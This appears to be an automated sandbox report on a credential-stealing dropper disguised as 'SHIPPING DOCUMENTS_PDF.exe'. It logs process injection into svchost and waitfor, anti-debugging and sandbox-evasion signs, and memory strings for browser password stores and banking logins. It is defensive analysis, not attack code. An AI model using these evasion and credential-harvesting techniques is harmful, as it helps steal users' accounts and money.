                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2423088351.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2425297116.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2423088351.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2425297116.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2425106123.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4472625168.0000000002F80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SHIPPING DOCUMENTS_PDF.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"Jump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SHIPPING DOCUMENTS_PDF.exeStatic file information: File size 1188352 > 1048576
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170370235.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473119648.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B54B37 LoadLibraryA,GetProcAddress,0_2_00B54B37
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B78945 push ecx; ret 0_2_00B78958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004CA027 push eax; retf 2_2_004CA028
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C8A2C push ecx; ret 2_2_004C8A59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C8A33 push ecx; ret 2_2_004C8A59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C8286 push 7AE781A2h; iretd 2_2_004C82AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BAB95 push es; retf 2_2_004BAB99
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BBCE8 push ecx; ret 2_2_004BBCEF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B3480 push eax; ret 2_2_004B3482
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BE5F4 push FFFFFF8Ah; iretd 2_2_004BE5FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C7EB7 push esi; iretd 2_2_004C7EC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004D4F63 push edi; retf 2_2_004D4F6E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300225F pushad ; ret 2_2_030027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030027FA pushad ; ret 2_2_030027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300283D push eax; iretd 2_2_03002858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C227FA pushad ; ret 5_2_04C227F9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C2225F pushad ; ret 5_2_04C227F9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C2283D push eax; iretd 5_2_04C22858
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C509AD push ecx; mov dword ptr [esp], ecx5_2_04C509B6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C21200 push edx; retn 0004h5_2_04C21206
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C218A7 push ds; ret 5_2_04C2198E
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C219DB push 262804D4h; ret 5_2_04C219EA
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C29939 push es; iretd 5_2_04C29940
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C7229F push ebp; retf 5_2_02C722A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C8020E push eax; retf 5_2_02C8020F
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C74A34 push esi; iretd 5_2_02C74A3D
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C76BA4 push eax; retf 5_2_02C76BA5
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C68865 push ecx; ret 5_2_02C6886C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C74E03 push 7AE781A2h; iretd 5_2_02C74E27
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C75058 push 42629074h; iretd 5_2_02C75069
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B548D7
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00BD5376
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B73187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B73187
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeAPI/Special instruction interceptor: Address: 9B3244
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 9842Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105550
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\waitfor.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784Thread sleep count: 130 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784Thread sleep time: -260000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784Thread sleep count: 9842 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784Thread sleep time: -19684000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BB445A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBC6D1 FindFirstFileW,FindClose,0_2_00BBC6D1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BBC75C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBEF95
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBF0F2
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBF3F3
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB37EF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB3B12
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBBCBC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C7C290 FindFirstFileW,FindNextFileW,FindClose,5_2_02C7C290
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B549A0
                Source: B201338.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: B201338.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: B201338.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: B201338.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: B201338.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: B201338.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: B201338.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: B201338.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: B201338.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: B201338.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: B201338.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: B201338.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: B201338.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: B201338.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: B201338.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4472896426.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2536320747.000002490541C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: B201338.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: B201338.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: B201338.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: B201338.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: B201338.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: B201338.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: B201338.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: B201338.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: B201338.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: B201338.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: B201338.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: B201338.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: B201338.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: B201338.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: B201338.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: B201338.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C76A3 LdrLoadDll,2_2_004C76A3
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC3F09 BlockInput,0_2_00BC3F09
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B53B3A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B85A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B85A7C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B54B37 LoadLibraryA,GetProcAddress,0_2_00B54B37
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_009B34B0 mov eax, dword ptr fs:[00000030h]0_2_009B34B0
